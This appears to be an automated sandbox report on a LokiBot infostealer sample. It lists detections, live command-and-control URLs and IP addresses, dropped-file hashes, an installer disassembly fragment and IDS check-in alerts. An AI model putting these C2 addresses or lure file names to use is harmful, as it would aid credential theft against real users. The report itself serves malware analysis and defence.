                1.2.dehbibhar.exe.9e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.2.dehbibhar.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                SourceDetectionScannerLabelLink
                sempersim.su21%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://sempersim.su/gf3/fre.php22%VirustotalBrowse
                http://sempersim.su/gf3/fre.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                sempersim.su
                88.218.168.92
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://sempersim.su/gf3/fre.phptrue
                • 22%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorErrordhGoVvfmul.exefalse
                  high
                  http://www.ibsensoftware.com/dehbibhar.exe, dehbibhar.exe, 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dehbibhar.exe, 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  88.218.168.92
                  sempersim.suRussian Federation
                  208861RACKTECHRUtrue
                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:620372
                  Start date and time: 04/05/202217:04:192022-05-04 17:04:19 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:dhGoVvfmul (renamed file extension from none to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:23
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@5/6@45/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 98.5% (good quality ratio 95%)
                  • Quality average: 79.4%
                  • Quality standard deviation: 27.5%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 71
                  • Number of non-executed functions: 30
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 40.125.122.176, 20.54.89.106, 20.223.24.244
                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  17:05:49API Interceptor41x Sleep call for process: dehbibhar.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  88.218.168.92Request_for_quotation.xlsxGet hashmaliciousBrowse
                  • sempersim.su/gf3/fre.php
                  DHL5678_356.exeGet hashmaliciousBrowse
                  • sempersim.su/gf7/fre.php
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  sempersim.suRequest_for_quotation.xlsxGet hashmaliciousBrowse
                  • 88.218.168.92
                  DHL5678_356.exeGet hashmaliciousBrowse
                  • 88.218.168.92
                  PI-USD90,731.00.xlsxGet hashmaliciousBrowse
                  • 109.107.175.150
                  K5Dyoyk0M1.exeGet hashmaliciousBrowse
                  • 109.107.175.150
                  project RFQ.xlsxGet hashmaliciousBrowse
                  • 2.59.40.178
                  2umKdwuIRi.exeGet hashmaliciousBrowse
                  • 2.59.40.178
                  DHL3_576.exeGet hashmaliciousBrowse
                  • 176.124.223.201
                  SOA APR 2022.pdf.exeGet hashmaliciousBrowse
                  • 176.124.223.201
                  SOA APR 2022.PDF.exeGet hashmaliciousBrowse
                  • 176.124.223.201
                  DHL_256_007.exeGet hashmaliciousBrowse
                  • 89.22.224.139
                  pHzK5t2F9V.exeGet hashmaliciousBrowse
                  • 45.129.2.17
                  P9zVYmgZqG.exeGet hashmaliciousBrowse
                  • 45.129.2.17
                  ref PO-DLP-0176.xlsxGet hashmaliciousBrowse
                  • 45.129.2.17
                  DHL_689567.exeGet hashmaliciousBrowse
                  • 45.129.2.17
                  payment advice.xlsxGet hashmaliciousBrowse
                  • 45.129.2.17
                  vbc.exeGet hashmaliciousBrowse
                  • 45.129.2.17
                  shipping doc.xlsxGet hashmaliciousBrowse
                  • 45.129.2.17
                  pZ8K1WT2X7.exeGet hashmaliciousBrowse
                  • 45.129.2.17
                  payment slip .xlsxGet hashmaliciousBrowse
                  • 45.129.2.17
                  SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                  • 45.129.2.17
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  RACKTECHRURequest_for_quotation.xlsxGet hashmaliciousBrowse
                  • 88.218.168.92
                  DHL5678_356.exeGet hashmaliciousBrowse
                  • 88.218.168.92
                  Fludex hub.exeGet hashmaliciousBrowse
                  • 95.181.164.53
                  pqBaG4UVQQ.dllGet hashmaliciousBrowse
                  • 45.10.40.116
                  r8z83OdJPe.exeGet hashmaliciousBrowse
                  • 185.197.74.202
                  sora.x86Get hashmaliciousBrowse
                  • 91.223.144.118
                  Genshin Unicore HACK 10.9.exeGet hashmaliciousBrowse
                  • 95.181.164.53
                  CmVqrLwk9m.exeGet hashmaliciousBrowse
                  • 185.197.74.202
                  A5rwgX3Uek.exeGet hashmaliciousBrowse
                  • 185.197.74.202
                  ZeShBGVmda.exeGet hashmaliciousBrowse
                  • 194.113.106.201
                  qBxhJaFouP.exeGet hashmaliciousBrowse
                  • 185.197.74.202
                  Vjnpu2Gln1.exeGet hashmaliciousBrowse
                  • 185.197.74.202
                  6xoF8YCNtP.exeGet hashmaliciousBrowse
                  • 88.218.168.4
                  stSwHK0sfz.exeGet hashmaliciousBrowse
                  • 95.181.164.53
                  oYVKpppL51.exeGet hashmaliciousBrowse
                  • 95.181.164.53
                  rQfmqwD14u.exeGet hashmaliciousBrowse
                  • 95.181.164.24
                  0R2HWdCJNj.exeGet hashmaliciousBrowse
                  • 185.197.74.202
                  2B9DEB8AC5E81A7DAB9A62AB926820281D5F91D8BF4B3.exeGet hashmaliciousBrowse
                  • 95.181.163.106
                  rK6vp7F5sdGet hashmaliciousBrowse
                  • 91.223.144.150
                  GenoSec.arm7Get hashmaliciousBrowse
                  • 91.223.144.126
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Users\user\AppData\Local\Temp\dehbibhar.exeRequest_for_quotation.xlsxGet hashmaliciousBrowse
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Request_for_quotation.xlsxGet hashmaliciousBrowse
                      C:\Users\user\AppData\Local\Temp\efnvplRequest_for_quotation.xlsxGet hashmaliciousBrowse
                        Process:C:\Users\user\Desktop\dhGoVvfmul.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):4096
                        Entropy (8bit):4.0668271918538625
                        Encrypted:false
                        SSDEEP:48:qDXboBaPMMlGIB2hnhY+q12GKgG5CeDb+X949gvRuqS:+XEoMme6MzVROthJx
                        MD5:99DF91CF3E9775BE40FE27FEFA10C203
                        SHA1:DBDA94E51F0F783E4C169D2D838D3377550450AC
                        SHA-256:A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                        SHA-512:D7ABD84314DCDCFEB42F230F901A7B5DA49EAD7D1F85F1AF34CC55D5A69278F1A7BF39BF08E92B22E81F50A8E0370705C709E550F1DE794095313DEBD2BA7F2D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Virustotal, Detection: 46%, Browse
                        • Antivirus: ReversingLabs, Detection: 24%
                        Joe Sandbox View:
                        • Filename: Request_for_quotation.xlsx, Detection: malicious, Browse
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.......................Q...........-...........<............Rich............PE..L.....ob..................................... ....@..........................@...............................................!.......0............................... ............................................... ...............................text...^........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\dhGoVvfmul.exe
                        File Type:DOS executable (COM, 0x8C-variant)
                        Category:dropped
                        Size (bytes):4935
                        Entropy (8bit):6.158373046672494
                        Encrypted:false
                        SSDEEP:96:Fp8h7t+r4zx4jrGP0VqcfWKcirH1BAbK6S6DWZlBy9FWGPZNQB2jK4CsBDL1:+tA4zx4jywfTOXUBKQ4XCstL1
                        MD5:E2FFABC730A2CF170A16934F49E1B05E
                        SHA1:09299351820381199C6CEE30062DFC5BE0A3E9A6
                        SHA-256:07A69D2284B659076040725425497D4DA10ADB891A5F3D54A10C707D2A74FB01
                        SHA-512:CFD2709345EE7D1DE087A3D46CF418F96EE347C1A37579608B84BD00747FCECC2D148A65CF7C879837DCEC9E58F3EE2D2C2D31B534B9E4174F2A57C17C99BF14
                        Malicious:false
                        Joe Sandbox View:
                        • Filename: Request_for_quotation.xlsx, Detection: malicious, Browse
                        Reputation:low
                        Preview:........&.....&.....c.....c....&...j....&.........0.....,.{,........0.....,.s,.w......0..t...,.k,.o......0.._...,.c,.g& ........c...<,.,....&...l,.,......0.d.u.........0.e,...,..&........&..n.....{...s...k....c..........(..........,..&......{.....,........j.....&..n..........le.........c....................d..d.,..,........,......le.....i"..........e......"..........e.....>"......e.....&...c....j....0.{,.& ......i.....,....,.....(c....<....l.,.{,...0.<...d..,.{,.........c.0.{.....".n....u...,..0.......,.& ....&.....j......le.....&...c....j....0.c,.& ......i.....,....,...<...(c.'-.....<....l.,.c,..g..<...d..,.c,..g..<...t.,.c,..g...l....u.,.c,.g0.<...d..,.c,..g......c.0.c....i".........,.& ........,......................,.& ....&.....j......le.....&..j....0.,.& ......i.....,....,...E...(c....<....l.,.,.....<...d..,.,.........c.0.....>"........,.........Z..
                        Process:C:\Users\user\Desktop\dhGoVvfmul.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):106495
                        Entropy (8bit):7.955489709110049
                        Encrypted:false
                        SSDEEP:1536:hYYUu04hEOBzupNyyKiYjPFvrNHzNwZWOzLqJW0bvivVEPq80H46I:hYYVhEO+AFvlSkOzuJDudEy/H+
                        MD5:92B8F8D79D15063FE55F13D98069FD80
                        SHA1:46EA07994665E3560A6FE9B38483D47B8527B6DD
                        SHA-256:92336A96341D13C5B45A82EE508A85EAE3C907DDF9E2C62DD99F5DB2CA59D9CE
                        SHA-512:96B1E4FEB23DA9B0711BCEB637CF3DE80C9F62592BD673E4A83E20F5DBD15F225D40FE0D9624B0ED029EA1AFA46C167E03C7CEDE27BCBF7D51B146481450267C
                        Malicious:false
                        Reputation:low
                        Preview:.G.......H.CV.+.......IzLq...n.Aj..............}.f.`.;......>.....$.B2y.6K..D.....#...l.y..M....'O.....sE.......;;b....L.<.#w...r..>.[#~.cT.<....E.y.[.......iL..(....0]..8&k...et..5.h9e@D.i[....A.G..>..(........g.W.V.......k....x...A........h(...:..{..C.p>.h.....Ih....n.A.a......:.........`.;.B.l.y>.....$.9... ....I....r.#.t.u........: ..Cu..o">cf.....F.L.<.#wBm.6..i.h...*.G..z.d....#5M7.o.9V].y,.....0.....a>....!.'.p...n......e.....d5k.|..[P......5.>.....<m.'.x..........Qh....:.*...6H.C.+H..l....IJvq...j.Ai..............}.f...;....z.>....$.@... ...G..... .#.tx.........: .aCu..."..7...J.F.L.<.#wBm.6..i.h...*.G..z.d....#5M7.o.9V].y,.....0.....a>....!.'.p...n............d5k.|..[P......5.>.....k....x..#A..B....Qh(...:.*...6H.C..+.h.....I.Lq...n.Aj..............}.f.`.;.....y>......$.9... ......... .#.tx.u........: ..Cu..o".k7.....F.L.<.#wBm.6..i.h...*.G..z.d....#5M7.o.9V].y,.....0.....a>....!.'.p...n............d5k.|..[P......5.>....
                        Process:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):4096
                        Entropy (8bit):4.0668271918538625
                        Encrypted:false
                        SSDEEP:48:qDXboBaPMMlGIB2hnhY+q12GKgG5CeDb+X949gvRuqS:+XEoMme6MzVROthJx
                        MD5:99DF91CF3E9775BE40FE27FEFA10C203
                        SHA1:DBDA94E51F0F783E4C169D2D838D3377550450AC
                        SHA-256:A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                        SHA-512:D7ABD84314DCDCFEB42F230F901A7B5DA49EAD7D1F85F1AF34CC55D5A69278F1A7BF39BF08E92B22E81F50A8E0370705C709E550F1DE794095313DEBD2BA7F2D
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 24%
                        Joe Sandbox View:
                        • Filename: Request_for_quotation.xlsx, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.......................Q...........-...........<............Rich............PE..L.....ob..................................... ....@..........................@...............................................!.......0............................... ............................................... ...............................text...^........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Preview:........................................user.
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.733849688630961
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:dhGoVvfmul.exe
                        File size:125839
                        MD5:5c5d4e3e0dadff03da7b9878acf3e706
                        SHA1:38a387d18c147245078db39a82f8531816c9d726
                        SHA256:bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596
                        SHA512:073194f0f86af4ca4721b3d7ea7e78755b90e1c8e85e27c969f0407a4ab78bf0af153177e96e583d952c9dacb6cc7b7a0071eabc80ff015b5f209a9b668ff2c4
                        SSDEEP:3072:l1NjcVVnLpPunbxOP+E6zXX3BeTZpqiJ5OboPYtfyr/cDA:HNeZmE29oT5bRYlyr/z
                        TLSH:96C3029C66A0C0B3C9F247322A361377DEF6952266668B0F03604F9C7D66781EE0D776
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                        Icon Hash:b2a88c96b2ca6a72
                        Entrypoint:0x4034f7
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 000003F4h
                        push ebx
                        push esi
                        push edi
                        push 00000020h
                        pop edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [ebp-14h], ebx
                        mov dword ptr [ebp-04h], 0040A2E0h
                        mov dword ptr [ebp-10h], ebx
                        call dword ptr [004080CCh]
                        mov esi, dword ptr [004080D0h]
                        lea eax, dword ptr [ebp-00000140h]
                        push eax
                        mov dword ptr [ebp-0000012Ch], ebx
                        mov dword ptr [ebp-2Ch], ebx
                        mov dword ptr [ebp-28h], ebx
                        mov dword ptr [ebp-00000140h], 0000011Ch
                        call esi
                        test eax, eax
                        jne 00007EFCA8D2EB2Ah
                        lea eax, dword ptr [ebp-00000140h]
                        mov dword ptr [ebp-00000140h], 00000114h
                        push eax
                        call esi
                        mov ax, word ptr [ebp-0000012Ch]
                        mov ecx, dword ptr [ebp-00000112h]
                        sub ax, 00000053h
                        add ecx, FFFFFFD0h
                        neg ax
                        sbb eax, eax
                        mov byte ptr [ebp-26h], 00000004h
                        not eax
                        and eax, ecx
                        mov word ptr [ebp-2Ch], ax
                        cmp dword ptr [ebp-0000013Ch], 0Ah
                        jnc 00007EFCA8D2EAFAh
                        and word ptr [ebp-00000132h], 0000h
                        mov eax, dword ptr [ebp-00000134h]
                        movzx ecx, byte ptr [ebp-00000138h]
                        mov dword ptr [0042A2D8h], eax
                        xor eax, eax
                        mov ah, byte ptr [ebp-0000013Ch]
                        movzx eax, ax
                        or eax, ecx
                        xor ecx, ecx
                        mov ch, byte ptr [ebp-2Ch]
                        movzx ecx, cx
                        shl eax, 10h
                        or eax, ecx
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xa50.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x65150x6600False0.661534926471data6.43970794855IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa0000x203380x600False0.499348958333data4.01369865045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x3b0000xa500xc00False0.402018229167data4.18462166815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x3b1900x2e8dataEnglishUnited States
                        RT_DIALOG0x3b4780x100dataEnglishUnited States
                        RT_DIALOG0x3b5780x11cdataEnglishUnited States
                        RT_DIALOG0x3b6980x60dataEnglishUnited States
                        RT_GROUP_ICON0x3b6f80x14dataEnglishUnited States
                        RT_MANIFEST0x3b7100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                        DLLImport
                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        05/04/22-17:06:31.292534 05/04/22-17:06:31.292534TCP2825766ETPRO TROJAN LokiBot Checkin M24978780192.168.2.488.218.168.92
                        05/04/22-17:06:16.374113 05/04/22-17:06:16.374113TCP2025483ET TROJAN LokiBot Fake 404 Response804978088.218.168.92192.168.2.4
                        05/04/22-17:06:18.169397 05/04/22-17:06:18.169397TCP2825766ETPRO TROJAN LokiBot Checkin M24978180192.168.2.488.218.168.92
                        05/04/22-17:07:15.237173 05/04/22-17:07:15.237173TCP2825766ETPRO TROJAN LokiBot Checkin M24981080192.168.2.488.218.168.92
                        05/04/22-17:06:22.890812 05/04/22-17:06:22.890812TCP2825766ETPRO TROJAN LokiBot Checkin M24978480192.168.2.488.218.168.92
                        05/04/22-17:07:26.375874 05/04/22-17:07:26.375874UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5178753192.168.2.48.8.8.8
                        05/04/22-17:06:09.089375 05/04/22-17:06:09.089375UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5759453192.168.2.48.8.8.8
                        05/04/22-17:06:10.670601 05/04/22-17:06:10.670601UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6051253192.168.2.48.8.8.8
                        05/04/22-17:06:46.460576 05/04/22-17:06:46.460576TCP2025483ET TROJAN LokiBot Fake 404 Response804979388.218.168.92192.168.2.4
                        05/04/22-17:07:04.571093 05/04/22-17:07:04.571093TCP2825766ETPRO TROJAN LokiBot Checkin M24980180192.168.2.488.218.168.92
                        05/04/22-17:05:51.935858 05/04/22-17:05:51.935858TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.488.218.168.92
                        05/04/22-17:07:24.436443 05/04/22-17:07:24.436443TCP2825766ETPRO TROJAN LokiBot Checkin M24981480192.168.2.488.218.168.92
                        05/04/22-17:07:32.534838 05/04/22-17:07:32.534838UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6079053192.168.2.48.8.8.8
                        05/04/22-17:07:18.160224 05/04/22-17:07:18.160224TCP2825766ETPRO TROJAN LokiBot Checkin M24981280192.168.2.488.218.168.92
                        05/04/22-17:06:03.575681 05/04/22-17:06:03.575681TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.488.218.168.92
                        05/04/22-17:07:24.858929 05/04/22-17:07:24.858929TCP2025483ET TROJAN LokiBot Fake 404 Response804981488.218.168.92192.168.2.4
                        05/04/22-17:07:21.051803 05/04/22-17:07:21.051803TCP2025483ET TROJAN LokiBot Fake 404 Response804981388.218.168.92192.168.2.4
                        05/04/22-17:07:26.425495 05/04/22-17:07:26.425495TCP2825766ETPRO TROJAN LokiBot Checkin M24981580192.168.2.488.218.168.92
                        05/04/22-17:06:11.460186 05/04/22-17:06:11.460186TCP2025483ET TROJAN LokiBot Fake 404 Response804977888.218.168.92192.168.2.4
                        05/04/22-17:05:46.967263 05/04/22-17:05:46.967263TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.488.218.168.92
                        05/04/22-17:06:15.851899 05/04/22-17:06:15.851899UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5044553192.168.2.48.8.8.8
                        05/04/22-17:07:34.959527 05/04/22-17:07:34.959527TCP2825766ETPRO TROJAN LokiBot Checkin M24981980192.168.2.488.218.168.92
                        05/04/22-17:05:50.222185 05/04/22-17:05:50.222185TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.488.218.168.92
